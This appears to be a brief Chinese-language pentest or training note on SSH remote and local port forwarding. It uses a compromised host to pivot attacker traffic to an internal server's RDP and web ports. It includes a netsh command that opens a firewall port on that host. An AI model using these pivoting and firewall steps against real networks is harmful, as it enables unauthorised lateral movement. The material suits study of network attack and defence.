SSH 远程端口转发
攻击者利用端口转发,将攻击者主机的 3389 流量经 PC-1 转发到 Server 主机
C:\> ssh tunneluser@1.1.1.1 -R 3389:3.3.3.3:3389 -N
:::tips -R: 指定 SSH 服务器开启的端口
:::
munra@attacker-pc$ xfreerdp /v:127.0.0.1 /u:MyUser /p:MyPassword
SSH 本地端口转发
C:\> ssh tunneluser@1.1.1.1 -L *:80:127.0.0.1:80 -N
由于我们需要在 PC-1 开启一个新端口,那么我们需要修改管理权限
netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
现在我们在攻击者主机访问任何 2.2.2.2:80 都将会访问到 3.3.3.3:80